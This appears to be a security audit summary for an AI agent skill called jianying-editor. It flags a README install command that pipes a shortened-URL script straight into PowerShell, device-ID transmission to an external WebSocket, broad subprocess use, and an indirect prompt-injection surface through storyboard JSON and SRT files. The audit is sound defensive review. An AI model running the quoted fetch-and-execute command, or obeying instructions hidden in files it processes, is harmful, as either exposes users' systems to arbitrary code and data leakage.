The Agent Skills Directory

[EXTERNAL_DOWNLOADS]: The README.md recommends a one-click installation using a shortened URL (is.gd/rpb65M). The use of redirection services masks the final download target, which is a significant security risk.
[REMOTE_CODE_EXECUTION]: The installation command 'irm is.gd/rpb65M | iex' in README.md pipes the content of a remote script directly into the PowerShell interpreter. This allows for arbitrary code execution on the user's system without prior review.
[DATA_EXFILTRATION]: The file scripts/universal_tts.py contains logic to extract unique local identifiers (device_id and iid) from JianYing's configuration files and logs. These sensitive IDs are then transmitted to an external WebSocket endpoint (wss://sami.bytedance.com) to authenticate TTS requests.
[COMMAND_EXECUTION]: Extensive use of the subprocess module is found across several files (scripts/api_validator.py, scripts/web_recorder.py, scripts/sync_jy_assets.py, tools/recording/recorder.py) to run system-level tools such as ffmpeg, ffprobe, and playwright. While necessary for the skill's functionality, this provides a powerful primitive for potential abuse.
[PROMPT_INJECTION]: The skill possesses a surface for indirect prompt injection (Category 8) as it processes untrusted external data like storyboard JSONs and SRT subtitles to automate video editing. Mandatory Evidence Chain: 1. Ingestion points: storyboard.json (scripts/movie_commentary_builder.py) and SRT files (scripts/video_transcribe_and_match.py). 2. Boundary markers: Absent in the prompts used to process these files. 3. Capability inventory: Subprocess execution (ffmpeg), file system access (draft generation), and network operations. 4. Sanitization: Limited sanitization is applied only to project names in scripts/core/project_base.py.

jianying-editor